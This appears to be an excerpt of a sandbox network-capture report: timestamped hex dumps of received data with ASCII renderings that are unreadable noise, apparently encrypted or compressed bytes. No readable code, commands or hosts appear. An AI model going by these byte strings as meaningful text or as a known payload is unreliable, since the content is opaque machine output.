                                                                                                                                                                                                                                                                2023-01-05 08:23:11 UTC1129INData Raw: 26 f2 c3 d0 ed cc a6 e8 55 47 24 29 e2 ba 07 a7 32 ee d6 2e 40 d9 cc 71 47 f5 36 01 3c e5 bb fc db ef 3f d3 86 e3 05 af d9 03 5e eb 14 24 43 c0 bd 3c 8b 5a 28 f7 ff 44 a6 5b 5b d5 21 04 50 38 1c 2c 0c fd c1 56 bd 68 7b 33 53 b6 5b 67 3f 8b 01 4c 52 64 27 73 3b 28 ca e6 ba 76 9b 1d f1 7b 1a 82 a9 fd ab 4d 8e bb 09 04 69 e4 81 a4 03 89 a3 b5 5a 3b 17 1c 83 0a 2c 5e 13 fb 56 bd 02 f1 6a c1 58 f4 b6 e1 ff b3 bc da 2d 96 ee 29 3f 16 dc 14 82 6a 40 a5 9c 74 44 eb 0c 03 20 87 e1 43 2a 73 e4 01 b8 30 6e 73 ea 66 02 1e 8b 78 ed 43 4a a0 f2 fd 77 a4 81 60 03 a8 5a 86 3f ea 9e 99 0d 62 a3 a8 1b 3a 4d 10 b4 5b 00 fd ca c5 86 e1 53 e2 79 b2 85 17 ae 06 02 22 42 6b d7 75 eb da e4 81 4f 28 f4 8c a7 f6 2b a0 cc 1b e4 1b f2 0d 41 df 6c b6 f4 e6 bc c2 e0 76 69 d7 82 01 93
                                                                                                                                                                                                                                                                Data Ascii: &UG$)2.@qG6<?^$C<Z(D[[!P8,Vh{3S[g?LRd's;(v{MiZ;,^VjX-)?j@tD C*s0nsfxCJw`Z?b:M[Sy"BkuO(+Alvi
                                                                                                                                                                                                                                                                2023-01-05 08:23:11 UTC1145INData Raw: b9 e8 d3 ab 80 ab 21 44 57 25 c5 df f3 58 24 01 80 44 cb ba 32 77 9b e0 71 04 ef f4 92 44 42 f0 89 f8 2c a7 5d e2 24 0a c5 c3 e2 f1 09 55 34 38 d8 f1 65 c2 a0 67 f8 d1 02 ab 25 20 29 50 dc d5 66 47 3a 77 76 3b 8f d4 37 e1 4f a4 be f6 f0 7a 45 bd a3 f6 55 b3 e6 a5 da 1c f5 b8 2c 3b 9d 93 fb e0 cc fa 12 02 62 1d a3 bc dc 61 f0 13 65 64 38 44 3a 8e da 5b 40 35 79 07 f1 70 21 ed b3 e7 ad ca a0 83 2d 92 93 f1 ef e5 9c 14 2e 3d e4 48 f3 65 21 7e 4f fa 59 ca 27 47 8e e0 4d 57 8f 58 08 40 a0 f8 57 dd 80 30 41 e5 0f 9e aa e9 6e 08 52 f4 80 45 4e d1 45 9c d9 7b b3 ad 12 ea 49 f4 89 96 d9 31 0c 00 32 3e 2c fd 81 10 98 8f 44 e3 8f 9d 3e 99 b7 22 b0 07 61 59 41 9e a7 96 de d2 8d de eb ce e9 95 f4 77 37 0e 41 a5 5a cb 89 0c a5 60 e8 3a af a4 4c eb 2e 35 42 3f ed c6 f6
                                                                                                                                                                                                                                                                Data Ascii: !DW%X$D2wqDB,]$U48eg% )PfG:wv;7OzEU,;baed8D:[@5yp!-.=He!~OY'GMWX@W0AnRENE{I12>,D>"aYAw7AZ`:L.5B?
                                                                                                                                                                                                                                                                2023-01-05 08:23:11 UTC1161INData Raw: 55 50 de 90 e5 e8 c3 1c c4 81 49 95 54 d4 ab 45 25 c3 a6 1a 7f 1a bb 57 5a 13 43 3d 92 a6 9e 7f 33 8d 27 73 26 8e 63 5f 1e 8a 58 31 f2 22 81 f5 05 e6 cd 0c ba 5d 01 ee 2d 2d 41 a0 41 99 e0 02 ff ba 93 d8 e2 ad 5a 68 45 de ae 00 bc 73 d9 e7 93 89 71 e4 e6 32 8b 00 af f9 77 2b 7e e7 aa a0 49 15 9f ad 87 d3 9b f7 b5 93 77 75 a8 84 ed 7e 80 5c 4b f2 c3 60 a5 8b 8b 1a c3 27 b4 d4 63 47 b0 8a ed 7c 86 75 c4 b5 79 74 80 9c 27 a0 01 56 59 c2 f2 a7 66 d6 cf 22 f9 d1 3a 17 12 bc a4 71 86 27 5b f2 8c b1 15 d2 05 33 31 18 9f e4 79 07 95 94 5a a8 d9 50 68 7a 35 82 61 66 d0 21 92 0f fb 89 5f d3 30 cb 96 9f 0f c9 23 8f 63 c6 85 ae 16 56 41 b0 e7 f4 5b 4f e2 65 c5 25 b9 c2 ef f1 fe c3 7b 96 ad b1 93 98 de a9 07 8d 2b 2e 58 24 78 31 d2 04 26 34 52 45 4f bd b3 e6 41 55 95
                                                                                                                                                                                                                                                                Data Ascii: UPITE%WZC=3's&c_X1"]--AAZhEsq2w+~Iwu~\K`'cG|uyt'VYf":q'[31yZPhz5af!_0#cVA[Oe%{+.X$x1&4REOAU
                                                                                                                                                                                                                                                                2023-01-05 08:23:11 UTC1177INData Raw: 98 69 81 5e a9 0d bc bc 85 48 f7 d2 0c f5 16 ef 77 3f a8 89 68 b5 1d cd 8e 62 0e f9 79 0c 16 b9 77 de 2d f3 f8 39 bc e3 64 62 3c d8 90 a4 43 67 03 d1 03 9a 0c df 3e 7e 62 0e ac 1c 10 33 25 48 a8 40 71 18 f5 98 d6 8d 76 27 c6 5d a5 76 87 19 4a ef 13 97 d2 ea 44 ba 81 4c fd b8 4f 70 f9 ba fa f4 9c 5a 43 bf ca 37 6e 13 2c 71 da f4 50 47 b6 1f 5d 50 e1 89 27 29 4d aa 3b 58 40 89 8e ee 3c 57 63 3e 79 46 a3 ea 04 0b 37 53 d1 cb aa 3c fd 42 c3 8c f9 3d bb 3d c2 fd 23 f4 3f 2f cb a8 6f 4f 1c 1e c3 a8 b0 24 9f 8c 05 ac ea e1 ce 87 bc 25 0f 70 46 d5 d6 ee 16 0c e6 27 21 8e 2d 3d ec 00 b4 ff 1c 85 2d c0 20 4d 97 45 6a 01 1c d2 f4 b4 18 f1 e6 9a c4 ff a5 34 2a 17 4e a5 13 7b 72 87 33 3e 93 e3 68 5e ae c0 05 52 ed da d9 0d 06 47 a8 6b 66 af 43 57 b3 3e bd 97 c1 d5 5d
                                                                                                                                                                                                                                                                Data Ascii: i^Hw?hbyw-9db<Cg>~b3%H@qv']vJDLOpZC7n,qPG]P')M;X@<Wc>yF7S<B==#?/oO$%pF'!-=- MEj4*N{r3>h^RGkfCW>]
                                                                                                                                                                                                                                                                2023-01-05 08:23:11 UTC1193INData Raw: 85 47 cf e4 b3 63 8d 91 76 07 4e 07 3b 4c 68 03 86 1b 73 e9 4f 04 c1 9e 7b 5b a5 ad 85 39 8a b2 56 ff 92 0e 02 05 cc 9c 89 e9 1b 8c 1d 5a 84 3a 62 62 3b dd 4b 3f c7 a7 9c ed 3e 7e 78 0b 53 ba ce 35 b9 a4 a2 f0 0e 59 04 2d 9a 4c 60 a9 39 98 fa 9c 4e de f9 c0 f2 d6 1f d9 fe 5e 81 f2 34 87 7f c8 fd 11 93 f9 cc f4 0a 48 11 8a b3 fd 53 1b 5c 57 63 ee cd a6 de 5e 5f 5f 28 21 cf 69 90 cf f4 17 02 47 d1 1d 1c 05 69 ce e0 bf 0e 2f 08 23 85 71 70 16 7f e5 46 90 21 c8 85 39 84 95 bb d1 05 f2 c3 13 90 c3 30 2c 0c 4e aa d6 27 21 d2 43 f4 8c 42 99 6c 75 53 24 f9 f2 3e c5 5f 63 23 bd bf 8f d6 9f cd bc 24 c8 5d e7 8e a2 ba 74 f1 ec a8 24 fa 84 67 04 0c a9 5b 5f a8 b7 50 b5 3a cd 12 8e 85 02 67 36 18 3c 9c c1 8d 35 33 e3 69 cc d1 3e cc ea 50 84 03 93 17 72 00 90 26 79 11
                                                                                                                                                                                                                                                                Data Ascii: GcvN;LhsO{[9VZ:bb;K?>~xS5Y-L`9N^4HS\Wc^__(!iGi/#qpF!90,N'!CBluS$>_c#$]t$g[_P:g6<53i>Pr&y
                                                                                                                                                                                                                                                                2023-01-05 08:23:11 UTC1209INData Raw: fa 2d 7b 0c 72 32 1e 35 ff 34 e0 8f c7 f5 73 7f 28 5c 3f 5d ac 26 0c 2e 64 2d 9e ef 93 57 79 f8 5f d1 37 9b c2 a2 34 d0 ca df 1a 3e 52 68 61 7e 9e 94 18 d3 d7 07 aa 0b 26 ec d7 b3 14 da 06 66 c4 5d 66 26 b3 b4 2b 9a b3 66 fc fa 8a 0a 91 f3 96 74 0e 71 14 40 58 1d 3e 38 59 3f 68 4b 64 1b 00 29 f6 5f ad 19 c9 b4 94 03 6e f7 1f e1 f9 74 8a e0 16 7b 23 29 d9 3d 80 3a 87 9d 66 55 1c 33 06 c4 86 16 93 1f 60 f1 02 83 08 ee b4 04 4c 12 bb 51 29 cf 87 17 86 f1 de 90 5e c9 c5 fe c4 be ec 8f 20 2b c8 ec 19 8f 26 00 a1 b8 1e e2 07 01 2f 86 9d 0c 7c 59 30 1f b2 59 bf 24 ef f4 07 aa 0e a8 a8 d0 44 98 da 2d 68 09 ff 8e c4 2d a1 69 4b 00 be 5e ad d6 63 b0 1d 2c d3 ea 06 bc 08 fb 1e 8d 22 83 a9 58 9b df 13 f6 d5 09 3a 8d ef 19 91 72 8a b6 98 83 ca 1a dd bb 42 c4 17 ac 5b
                                                                                                                                                                                                                                                                Data Ascii: -{r254s(\?]&.d-Wy_74>Rha~&f]f&+ftq@X>8Y?hKd)_nt{#)=:fU3`LQ)^ +&/|Y0Y$D-h-iK^c,"X:rB[
                                                                                                                                                                                                                                                                2023-01-05 08:23:11 UTC1225INData Raw: 37 7d 72 f0 45 ea f1 d7 f3 34 1f f7 60 9d 5a 72 22 0b d5 ee 2d c7 81 93 9d 24 ac 61 7c c0 77 79 27 99 3c 3e 97 6e f9 ad 55 d6 d2 eb aa e8 33 9c 31 42 54 10 97 0b 73 a9 fc fb 98 84 2a 91 89 09 09 83 84 c4 92 2a 4b 8e 16 4d 8c 1d cc 92 48 69 72 af 1f 6f 8c 8b 2e 46 6c 31 db b1 6d 69 65 79 c8 d9 22 64 e5 63 39 18 6d 55 55 9a 82 25 fb e8 bf 44 31 ec b2 76 4c a5 9f 71 68 0d 22 fd 73 3f b9 27 1a 2c cb b3 35 58 48 7a 1b 28 e9 71 34 52 3e 94 35 d0 7b ef 44 4b 73 2a 33 f9 8e 06 87 c3 1d 88 4d 6a e6 3a 22 4a 26 20 43 94 7e 94 21 da 7a 4c ef 61 22 28 53 bb 2f 6c f4 57 4a 4c 64 f3 7b dd 37 f0 ee e7 e4 84 ee 1a 43 4c d2 e6 a8 56 80 1a 24 11 38 09 96 ef 3e 7e 83 b7 76 44 6d db 3d 2a fd 87 7d 1c f6 94 84 fe 72 b3 51 7a 72 1d ff 7e 4c d2 32 a0 67 57 4f 20 9d 90 e2 12 64
                                                                                                                                                                                                                                                                Data Ascii: 7}rE4`Zr"-$a|wy'<>nU31BTs**KMHiro.Fl1miey"dc9mUU%D1vLqh"s?',5XHz(q4R>5{DKs*3Mj:"J& C~!zLa"(S/lWJLd{7CLV$8>~vDm=*}rQzr~L2gWO d
                                                                                                                                                                                                                                                                2023-01-05 08:23:11 UTC1241INData Raw: 1b ce 9b 24 2e 38 c1 75 c1 6c b8 b8 86 67 29 02 1f 52 fd eb 91 14 eb fa 9e 76 ba e7 97 ed 1f 22 92 93 ca 71 06 75 3e 3c be c1 34 66 67 bd 1a ed 70 2e ac 45 2f ed 76 77 62 65 64 d5 df 0d 7c ce 57 40 18 b3 28 ad 54 ff 3e e4 eb 01 d5 be 17 bb 39 a7 4d a6 75 51 92 32 62 35 72 6e da ae cc ff d5 c0 2e 7d 64 ff 07 0c 9b d5 23 4a 9f 97 55 75 6c 66 0e e0 17 79 83 9d 46 c8 36 7b 3d 10 6c d8 9c c1 74 7b f9 e9 e6 3c 90 10 6f f8 60 0c da 49 0a c0 3a 9d 1b d9 db b8 63 15 41 d3 6a c6 5e 3f 40 e0 39 46 af 3b bf eb 95 22 b2 08 0d 1b 77 22 a9 a6 fb 67 f8 41 73 61 6d 01 98 91 ee 4f b2 e4 a8 b7 34 c0 85 34 bd e6 88 7b 7c ca 91 40 03 88 07 9c 10 2f 09 91 d3 8d 08 00 d2 68 83 ce 6c 12 13 1d f5 40 17 8d ed 5c 8a 2e 19 0b a4 99 75 ef 61 7e 6d 01 34 d3 6e c6 3d f4 1b 79 a9 9f ef
                                                                                                                                                                                                                                                                Data Ascii: $.8ulg)Rv"qu><4fgp.E/vwbed|W@(T>9MuQ2b5rn.}d#JUulfyF6{=lt{<o`I:cAj^?@9F;"w"gAsamO44{|@/hl@\.ua~m4n=y
                                                                                                                                                                                                                                                                2023-01-05 08:23:11 UTC1257INData Raw: 25 5c 4a 5c 45 75 b6 a9 f6 a7 dc 2b b2 1f 97 88 91 de 79 4c 4c d6 ee f9 f2 c0 01 87 35 9b da 73 2e 2a 0a 37 41 af ad 8d c0 ae fc 64 3b c7 4c 7a 4f 8d f4 48 9f cc 84 56 e6 93 ed 29 ef e8 bf 1b c0 b6 8b 06 b6 fa af 1b 75 c4 d3 7b 74 d3 dd 28 fc b3 24 32 23 a7 9c 26 8c eb ac b6 d3 41 03 da 8e 06 3c ad 4e 83 61 f2 a3 fb cc 0a b4 e5 bf ef bb 91 e3 78 07 cb 54 cb 55 a1 81 f7 4c cf eb e3 24 bd 3e de 74 d0 0b 5a 9c ca 90 5e 9e b4 b8 bb 84 55 2b 7f 67 30 da a8 b0 a9 df a2 50 48 73 24 0c 87 d4 89 e7 79 93 47 74 7a 25 b7 36 39 84 58 10 a0 67 58 b0 5c 20 51 98 f0 64 4c f4 31 8c b5 44 63 dd 8b ef d9 76 d4 a7 60 56 3d e2 66 76 cd 5b aa 73 ca 08 8f 91 ca 5f a8 e0 bc 02 3b 48 6a 0b 8b 70 f1 4c 93 96 33 61 7f 2c bf c5 f3 6f 6f 5c 01 b6 eb 69 1a a4 82 dd 81 77 b4 ad 2d 4c
                                                                                                                                                                                                                                                                Data Ascii: %\J\Eu+yLL5s.*7Ad;LzOHV)u{t($2#&A<NaxTUL$>tZ^U+g0PHs$yGtz%69XgX\ QdL1Dcv`V=fv[s_;HjpL3a,oo\iw-L
                                                                                                                                                                                                                                                                2023-01-05 08:23:11 UTC1273INData Raw: 90 ac e4 7c 62 99 3f 83 6f 07 1d a4 c7 de 4c e2 65 62 5e 46 67 0c 82 cc d1 f1 45 8e 77 cb 36 d8 89 14 af 58 15 ba e6 40 6a fc f8 26 65 c2 32 ea ec a9 1b c8 17 5e 1e b7 fc 0d 80 7d c0 3c b7 66 c2 e9 01 18 32 1d f2 65 c3 3a 4b e2 ea c7 17 00 48 2e 04 5a cc f9 76 a8 71 a5 bc 88 33 fa c6 cf ed 74 70 3a ba 76 a8 86 de 83 31 71 ad 99 47 57 22 a6 f8 b8 db 82 e0 69 8b 3f 2c 11 03 df 6d ae b2 41 30 a3 d0 d9 42 27 76 c7 74 43 80 09 f4 b7 25 78 4e f3 bd b2 23 38 ad 55 17 55 7e be ea 6d d4 13 09 e9 14 06 d7 7d 8f 90 17 96 6f 21 12 84 08 b0 77 fb fe 2f 9a be a2 b0 62 d7 9d c8 e0 4e 1e d6 75 57 ca 76 3f 9f ca a3 64 96 84 aa cf 95 6e 22 6e 4e 8b 3c 57 e6 e2 07 02 88 f7 c4 ad 85 55 ab a0 1a bb 9f 23 49 61 75 5b 95 00 2b 2a 43 66 fe 68 8d 9b 9b 81 a2 4d 1d f2 d3 6b db 27
                                                                                                                                                                                                                                                                Data Ascii: |b?oLeb^FgEw6X@j&e2^}<f2e:KH.Zvq3tp:v1qGW"i?,mA0B'vtC%xN#8UU~m}o!w/bNuWv?dn"nN<WU#Iau[+*CfhMk'
                                                                                                                                                                                                                                                                2023-01-05 08:23:11 UTC1289INData Raw: 96 95 70 80 7b 9a 1e 60 ed a4 4b 3a f8 9f 74 18 01 b8 f0 c5 5e f1 6e 37 6a 8d 7a c2 7d 1c 99 45 90 61 c4 6b 33 c9 63 d9 c3 60 29 c3 87 a7 75 23 f3 bf 24 9d 34 d0 c9 96 6d 10 f0 cc 77 76 d1 de 2e 92 e8 96 74 07 be 74 e3 61 5e a2 c8 05 92 b7 fe c0 a0 dc 98 85 ba e4 cb d0 89 cc b3 0f 94 ad 02 c9 b0 56 1f b1 7e a3 3f d5 bf 89 63 8d 40 cf b1 67 14 6c dd fe fc 71 a3 93 06 1a aa a8 97 6e a6 9a 49 ad a2 8c 70 c3 6e 0b 55 31 fb bc 2a 70 30 d5 b3 2b a7 75 33 04 df 2f 7d 91 d2 b4 4a 27 08 22 cd a1 96 b1 1b 09 7f e3 29 b8 7e 24 04 e2 36 7b 4f bd 6e 04 9a ee 51 ff de e0 96 56 41 16 f6 ef d0 6c c8 bc 6a 87 13 fa 7f da 1b 70 f5 1e 20 a6 16 ea 69 1b 02 68 ef e7 45 7f 93 9a f6 02 13 49 6d 47 66 96 5a 17 77 79 15 35 94 f3 b7 32 5e b3 2e 7e 4c a7 d9 15 22 2d d4 70 63 82 aa
                                                                                                                                                                                                                                                                Data Ascii: p{`K:t^n7jz}Eak3c`)u#$4mwv.tta^V~?c@glqnIpnU1*p0+u3/}J'")~$6{OnQVAljp ihEImGfZwy52^.~L"-pc
                                                                                                                                                                                                                                                                2023-01-05 08:23:11 UTC1305INData Raw: 09 8c c2 58 d7 b7 cf 42 b5 eb 61 bb 63 5e 60 fe 6a ce 92 76 c8 25 44 ab 08 fd 8c 2c 9d 92 43 85 1e 52 4b ac 1a 29 22 61 bc ce ed ef 0e da c2 38 2d a0 38 62 ea cc 01 12 1f fd 3a 5e 40 90 f0 ae 4a 28 5d 90 c1 63 42 0d 81 62 37 b6 6b e0 4f 53 40 60 60 e8 dd 51 74 0f 06 b5 bf 2a a3 88 19 0d 48 15 8d b8 88 a7 2d 25 24 71 05 ba 88 38 ad 36 55 3e cb fb 24 35 39 ae 33 19 8f 17 14 7d 4b 34 9d 00 f0 e8 9b 8a 92 bc be 67 67 eb a1 dc 72 5f 0b 02 7f c8 1f 7a 97 5d 20 f4 1a 06 3b c4 0f 15 e3 51 72 82 28 4a f9 19 47 63 54 9d 2a d2 7e c3 33 ae 67 aa 6a 30 7b ad 7f ba dc fa 8b 5a f5 f0 ca 50 3c 7b e2 f9 7d eb da 74 42 39 81 0f 88 65 06 78 bf 1e 4e 55 20 08 16 b2 a9 bd 2d b1 22 6f 54 06 63 4a 61 90 bc c2 bb d4 f1 aa fd 53 9c 4c 4d 1b eb 65 26 43 6d 87 bf 2a f2 ba 23 e2 07
                                                                                                                                                                                                                                                                Data Ascii: XBac^`jv%D,CRK)"a8-8b:^@J(]cBb7kOS@``Qt*H-%$q86U>$593}K4ggr_z] ;Qr(JGcT*~3gj0{ZP<{}tB9exNU -"oTcJaSLMe&Cm*#
                                                                                                                                                                                                                                                                2023-01-05 08:23:11 UTC1321INData Raw: 44 68 99 90 ae 35 dc 9f a8 be 58 a9 3a 11 97 80 10 77 c3 bd 0c c8 cc 7b 3b 44 80 b1 a0 25 8a 39 c3 35 98 21 e0 a1 f1 bb c8 c3 78 1e 3d 19 46 cb bb 26 27 a5 78 fa f2 c2 2b 44 55 d4 26 ce 4e f0 ab ea d5 44 07 88 4a 36 7f 05 dc a1 af 8d a6 50 42 da 3a 6d 1c 16 86 d1 8e ee 5c 45 f1 16 6f 2a 6e 27 5f 9b 42 71 c9 89 48 c9 e2 83 c4 0a d4 81 50 ad bd ed 12 ac b0 c6 ba c2 01 93 6c dc a4 50 6c 50 92 4f b4 10 b7 0d 83 8c 4b 46 49 05 f7 47 92 a1 ba c1 89 02 92 24 d6 62 e7 e1 8d 19 14 27 5e 77 77 b8 d2 45 f7 46 5d 29 53 9b 5c 1d 04 b3 2e bb f2 0b 75 f1 cd 13 87 64 fc 2c 92 66 11 2b 25 9e cc 84 53 0f 95 70 c9 30 59 e3 cf cc 6f 24 4f 28 91 0d d2 e3 90 28 b5 11 1b ff 21 5a 93 be 2d 3c 1d 55 03 1b fc 46 3e a2 86 8c 54 a4 5e 02 5e d1 75 48 b1 85 3b 71 62 e5 52 56 31 96 25
                                                                                                                                                                                                                                                                Data Ascii: Dh5X:w{;D%95!x=F&'x+DU&NDJ6PB:m\Eo*n'_BqHPlPlPOKFIG$b'^wwEF])S\.ud,f+%Sp0Yo$O((!Z-<UF>T^^uH;qbRV1%
                                                                                                                                                                                                                                                                2023-01-05 08:23:11 UTC1337INData Raw: 1b ba ac ac bf 30 ad 3a 4c 63 e7 47 f0 0a da 90 88 79 a5 e9 9a 84 04 a0 59 4d d2 9b ef 32 41 cb ae 0e 53 83 2d 8a 8c ed b6 9a b3 43 06 bd ab bd 3d 1e 26 df 23 91 97 9f 8c a2 6b 92 c1 3a 9f a5 20 82 68 b6 d3 2b b5 28 07 07 fa b6 af 6c cd be b6 ca f7 f0 ba 9e 06 4e e0 e2 ad 30 24 2a 18 4a df e4 67 35 f4 b2 50 b7 10 ee c7 02 03 40 ca 6c 8e d4 e9 36 d3 9d d9 1d 3e 99 69 72 49 c1 3e 6b fb d5 38 27 8f 55 de 7b 74 07 e9 8f ee 38 2d b6 28 d3 36 b7 b1 06 62 25 5e ff 42 87 a7 f6 ad ae d5 c7 e4 da 7c 70 cc cf 6d c8 35 20 e0 3f 7f 34 96 af 9a 24 55 b6 22 d4 ac aa 5d 05 0d 4a b0 98 ab 25 27 1d 31 d1 74 46 5b b4 b5 77 00 96 79 61 18 60 e5 ea 48 04 a8 be 13 36 d2 4b 7c 69 2d ec f5 73 ef b3 6c 6f 4d b1 36 66 d0 38 e9 39 2c f3 9c 55 21 01 bb 93 47 ec 03 7a 27 42 44 f9 c4
                                                                                                                                                                                                                                                                Data Ascii: 0:LcGyYM2AS-C=&#k: h+(lN0$*Jg5P@l6>irI>k8'U{t8-(6b%^B|pm5 ?4$U"]J%'1tF[wya`H6K|i-sloM6f89,U!Gz'BD
                                                                                                                                                                                                                                                                2023-01-05 08:23:11 UTC1353INData Raw: 75 ac 9e 4d ae 1d fd c2 fc ae 85 cd ee e9 fc bc 9d 46 d7 3e ee c7 88 1c 72 22 13 5c f1 16 88 a8 7f f6 45 f9 d9 40 b7 85 95 d8 97 49 30 33 6e d9 ba 97 e4 45 c9 32 5d fc c7 ec b9 42 ef 95 63 9a 31 5f 80 71 2d bd 8a 4b 22 48 d6 47 bb a2 9b 58 f6 54 d9 19 52 0a d3 aa 86 6f 57 39 bb 20 9f 29 98 01 82 ea 92 ae ff 5c 41 dd a1 a8 8a 9c 96 36 58 01 db c3 8c a0 e9 08 5f a8 07 86 11 6f d1 9d 9e de 62 f8 a8 4b 0b 5c bb c9 43 f7 c3 f0 5d bb 8a 6b a0 88 d4 08 20 77 23 00 17 e5 b5 65 9d bc cf bd bd 90 58 9c b7 3b 56 69 92 d7 12 2c 2c 64 ae 6c 88 ac bd 7e 19 02 fe b4 c7 0a 8c d1 02 c0 1e d3 4b df 73 55 86 0b 81 7b 9c d7 41 64 37 bb ce 1e 1e e4 be ef a5 20 b7 57 4a 0f 62 83 26 c0 49 b4 35 bb da 5f 87 68 9e cb a9 ac f4 41 ce f5 8d e3 20 25 57 96 83 16 d9 bc 63 60 d2 7c cb
                                                                                                                                                                                                                                                                Data Ascii: uMF>r"\E@I03nE2]Bc1_q-K"HGXTRoW9 )\A6X_obK\C]k w#eX;Vi,,dl~KsU{Ad7 WJb&I5_hA %Wc`|
                                                                                                                                                                                                                                                                2023-01-05 08:23:11 UTC1369INData Raw: 74 5d fe b3 87 4b 22 91 ff 1b 3e 26 dc f6 7c bc 01 f7 d7 38 91 97 40 b2 10 15 ec db 03 f7 95 e8 57 7c 63 68 1b 0b 02 29 44 a2 19 3d 12 a0 a0 22 be 65 47 a4 b2 51 f9 a3 0b d9 28 f8 d5 99 5b 3e 27 43 c1 59 16 66 32 60 c9 d6 cd cd 3e bd 42 b4 88 68 06 7c e6 d3 4e 69 fc 52 47 15 6e dc 94 8b b8 fe 35 3f 43 5c d4 f4 87 33 82 82 09 dd 3c 88 f1 62 2f b4 1b 42 66 7f 2a a7 84 f2 33 63 fa b1 cf 69 e1 b0 1c 94 3b b8 47 3c 74 fb 66 81 96 62 69 78 ce 43 f9 f0 94 81 ee 41 53 ec 66 74 05 e2 43 ff 1c 5c fe 2f b5 2f 7e 1a bf 09 1d 96 d7 86 0a 37 d5 3d e3 e7 56 05 92 4f 2f 27 a2 41 17 a6 b9 22 6f a9 55 81 e8 ba 18 10 cd 14 ef 38 9b 3a 0e 77 20 dc 69 48 dd 26 cf 4d d6 44 1a 9c c6 9f e4 8b 5f aa ba ca 28 7e b8 dc 24 b1 c7 20 26 47 b7 24 92 a4 5e 02 ca a8 fb ac a2 ba 83 76 ed
                                                                                                                                                                                                                                                                Data Ascii: t]K">&|8@W|ch)D="eGQ([>'CYf2`>Bh|NiRGn5?C\3<b/Bf*3ci;G<tfbixCASftC\//~7=VO/'A"oU8:w iH&MD_(~$ &G$^v
                                                                                                                                                                                                                                                                2023-01-05 08:23:11 UTC1385INData Raw: 53 02 bd 61 1f b2 eb df ca f8 1d 18 e8 38 bd c2 80 ae 3b 8a bd a6 ac 86 3f bf e1 71 2d 78 40 7d be 4a 2d 6e 96 61 f8 fe 32 0d 44 5e 0f e1 d3 9f e7 66 ad f5 32 c0 93 f0 d0 9f bb b7 18 9f e2 9e 24 a9 ea 31 9b dc 4f 0b 80 0d dd 54 6c 85 e0 0a ef 61 62 7f c3 35 56 ff 15 fe e8 d7 79 09 93 26 47 3e 00 c1 ec 59 75 3a 0f a6 39 a3 64 0d 77 fb 30 3b c8 38 d5 a2 a3 03 da 3d f9 ed 6b 3c d0 70 03 bc 4d 3b 20 b5 ab 58 1a 8d f4 42 5e 16 49 83 38 f6 0a 4e 8f 7e 9e db 0b c5 60 71 54 9a ce df 16 b4 44 c9 2c 97 f0 18 97 fd 1f 1c ee 9f a9 66 33 0f 03 29 4b 4e 5c 22 fc 17 d4 52 74 c2 ca d1 85 12 f4 79 bc b6 ef eb ba 3e 09 7c c4 a1 1f be 64 c0 b6 e8 f9 d6 e0 4e 0f 85 5b 83 a1 68 9c 4a 11 81 0f 48 8e 50 97 97 88 5a c4 67 68 02 7c 03 45 4a fc 61 55 c2 ca 73 ba 09 0f 05 a5 1c 0f
                                                                                                                                                                                                                                                                Data Ascii: Sa8;?q-x@}J-na2D^f2$1OTlab5Vy&G>Yu:9dw0;8=k<pM; XB^I8N~`qTD,f3)KN\"Rty>|dN[hJHPZgh|EJaUs
                                                                                                                                                                                                                                                                2023-01-05 08:23:11 UTC1401INData Raw: a5 5a 81 50 63 7c e2 db a0 4f 1a dd 19 42 d6 12 ad 4f aa 48 fe 88 7b 19 dc e2 f5 7b a4 2a d2 e7 0f 69 8a 95 7f 42 74 13 a2 0f 5f 23 0c b2 a3 cf d1 b9 44 89 75 0f 8b 7d f5 9a f0 46 06 9a 67 93 a0 34 ff 98 d9 9a a1 7b d4 09 1d 13 9e 02 ab 6e 9c d6 18 72 0a 92 d7 ed 68 12 93 1d 30 bb 48 03 af 02 39 8c c0 2d 8d cc c0 b7 82 7b 4e d5 6e cd 8e 43 b5 06 76 67 8f 60 71 12 60 10 3e a9 ee e1 2b a2 42 8c 36 a2 e0 8f ff 52 79 22 38 7f 03 b1 03 cb ba 0e 13 ff 12 e0 df ac 05 cc df 6e 66 cb df 7f ea 56 b8 2f 87 01 f3 08 a2 17 d8 95 ad d5 14 65 9d 7a f9 c9 9f 64 41 c1 c8 1b 4b 58 39 bd 03 64 a3 e3 cb 8f 3f 18 01 da 9b 22 7d 94 c9 56 59 4a 80 e5 43 16 89 e5 e5 9e 8e f5 46 a0 bc 7d 23 cb 6a c5 c1 b9 0a 95 a0 cb ca cf 1a 5a 80 02 77 ba 01 06 25 5b fc c7 32 87 ca 93 fd 77 37
                                                                                                                                                                                                                                                                Data Ascii: ZPc|OBOH{{*iBt_#Du}Fg4{nrh0H9-{NnCvg`q`>+B6Ry"8nfV/ezdAKX9d?"}VYJCF}#jZw%[2w7
                                                                                                                                                                                                                                                                2023-01-05 08:23:11 UTC1417INData Raw: b4 5f c2 ca d1 f5 18 05 7f f5 27 da d9 04 91 a0 01 0e 44 a9 b5 06 97 83 e5 0c 00 f5 92 b2 52 9e 6b 71 18 4b 90 e0 dc 78 5c 93 2d 19 29 cf 01 39 76 c3 aa 12 21 19 1f 94 c3 40 fc db 48 0c 4c a9 2a 48 4c 01 2d 2b 58 06 db 35 4c 39 d0 df a4 2d c6 72 5f ad af 4d 6d d2 47 3a fd c1 88 92 bf 75 18 4e a7 7f 19 e7 1b d8 6c b7 f0 5f 74 d5 11 51 0a aa d3 e8 31 1f b4 df 0d f2 5f 25 69 bd 4e 33 98 08 f1 e7 4f 55 ce a1 cd 18 a8 d5 d1 c6 ee f1 18 9e 21 3d ea 42 a7 2b 2d 26 b6 aa 73 91 d1 15 36 cf df 9b 9c 2a 3e 17 dd 83 03 07 b3 c2 a9 a8 17 0c 94 f9 f7 9d 4a 18 67 c3 7e 6e 70 e8 a9 95 01 cf 2f c7 22 2c f0 3d 85 9b 94 4a e8 93 f6 a8 77 67 c7 92 b3 80 30 26 d9 fe e7 94 34 a4 58 53 2d ef b5 87 1f 86 c3 35 6c 90 14 05 89 ed 73 c5 d7 fc f4 6f a1 58 fe 35 4f 17 a9 8a 15 ca 84
                                                                                                                                                                                                                                                                Data Ascii: _'DRkqKx\-)9v!@HL*HL-+X5L9-r_MmG:uNl_tQ1_%iN3OU!=B+-&s6*>Jg~np/",=Jwg0&4XS-5lsoX5O
